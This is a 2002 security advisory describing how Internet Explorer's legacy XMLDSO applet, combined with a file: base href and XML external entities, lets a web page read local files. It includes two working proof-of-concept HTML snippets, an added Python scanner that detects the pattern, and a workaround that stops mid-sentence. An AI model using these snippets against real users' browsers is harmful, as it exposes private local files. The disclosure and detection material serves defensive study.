19th Aug 2002 [SBWID-5640]
COMMAND
XML Datasource applet allows local files to be sent to a remote site
SYSTEMS AFFECTED
All releases since IE 4.0
PROBLEM
Jelmer [jelmer@kuperus.xs4all.nl] found :
The problem lies in a legacy XML Datasource applet shipped with
Internet Explorer since its 4.0 release.
It is used in a page like this:
<applet code="com.ms.xml.dso.XMLDSO.class" width="0" height="0" id="xmldso"
MAYSCRIPT="true">
</applet>
As you can see, you don't specify a jar or cab file where the class is
loaded from; apparently it is added to the classpath from a local file.
It gets nasty when you add a <base href="file:///C:/"> tag to the
head section: the applet now thinks its codebase is local and you are
allowed to read local XML files. So this snippet will read c:\jelmer.xml:
<html>
<head>
<base href="file:///C:/">
</head>
<body>
<applet code="com.ms.xml.dso.XMLDSO.class" width=100% height=50 id="xmldso"
MAYSCRIPT="true">
<PARAM NAME="url" VALUE="jelmer.xml">
</applet>
<script language="javascript">
setTimeout("showIt()",2000);
function showIt() {
var jelmer = xmldso.getDocument();
alert(jelmer.Text);
}
</script>
</body>
</html>
Reading local XML files is bad enough, but there is more that can be
done. XML has a feature called external entities, which allows you to
combine multiple files as one big file. This allows us to read text
files as well, as shown by the following example:
<html>
<head>
<base href="file:///C:/">
</head>
<body>
<applet code="com.ms.xml.dso.XMLDSO.class" width="0" height="0" id="xmldso"
MAYSCRIPT="true">
<?xml version="1.0"?>
<!DOCTYPE file [
<!ELEMENT file (#PCDATA) >
<!ENTITY contents SYSTEM "file:///C:/jelmer.txt">
]>
<file>
&contents;
</file>
</applet>
<script language="javascript">
setTimeout("showIt()",2000);
function showIt() {
var jelmer = xmldso.getDocument();
alert(jelmer.Text);
}
</script>
</body>
</html>
A demonstration of the issue described is available at :
http://www.xs4all.nl/~jkuperus/msieread.htm
It reads and displays the contents of c:\jelmer.txt
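A content-filter style check for the page pattern described above, added here as an example and not part of the original advisory: it flags HTML that embeds the XMLDSO applet and reports a file: base href, a url parameter and any external entity declarations found alongside it. The function name, the finding labels and the sample page are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
XMLDSO_CLASS = "com.ms.xml.dso.xmldso"  # applet class named in the advisory, lowercased
# Matches an external entity declaration: <!ENTITY name SYSTEM "uri">
ENTITY_RE = re.compile(r'<!ENTITY\s+\S+\s+SYSTEM\s+["\']([^"\']*)["\']', re.I)

class _TagCollector(HTMLParser):
    """Collects the <base>, <applet> and <param> attributes the advisory relies on."""
    def __init__(self):
        super().__init__()
        self.base_hrefs, self.url_params = [], []
        self.xmldso_applets = 0
        self._in_xmldso = False

    def handle_starttag(self, tag, attrs):  # tag and attribute names arrive lowercased
        a = {k: (v or "") for k, v in attrs}
        if tag == "base" and "href" in a:
            self.base_hrefs.append(a["href"].strip())
        elif tag == "applet":
            self._in_xmldso = XMLDSO_CLASS in a.get("code", "").lower()
            self.xmldso_applets += int(self._in_xmldso)
        elif tag == "param" and self._in_xmldso and a.get("name", "").lower() == "url":
            self.url_params.append(a.get("value", ""))

    def handle_endtag(self, tag):
        if tag == "applet":
            self._in_xmldso = False

def scan_page(html):
    """Return findings for one HTML document; an empty list means no XMLDSO applet."""
    p = _TagCollector()
    p.feed(html)
    p.close()
    if not p.xmldso_applets:
        return []
    findings = ["xmldso-applet"]
    if any(h.lower().startswith("file:") for h in p.base_hrefs):
        findings.append("local-base-href")  # codebase forced to the local disk
    findings += ["url-param:" + u for u in p.url_params]
    # Entity declarations are matched on the raw text: HTML parsers do not model DTDs.
    findings += ["external-entity:" + u for u in ENTITY_RE.findall(html)]
    return findings

# Constructed sample: the advisory's second snippet, reduced to the parts that matter.
SAMPLE = '''<html><head><base href="file:///C:/"></head><body>
<applet code="com.ms.xml.dso.XMLDSO.class" width="0" height="0" id="xmldso" MAYSCRIPT="true">
<?xml version="1.0"?><!DOCTYPE file [ <!ELEMENT file (#PCDATA) >
<!ENTITY contents SYSTEM "file:///C:/jelmer.txt"> ]>
<file>&contents;</file></applet></body></html>'''
```

A page that yields both xmldso-applet and local-base-href matches the combination the advisory describes; xmldso-applet on its own is the applet's ordinary use.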
SOLUTION
Patch :
=======
None yet.
Workaround :
============
Disable Java altogether or install the Sun JDK it does not seem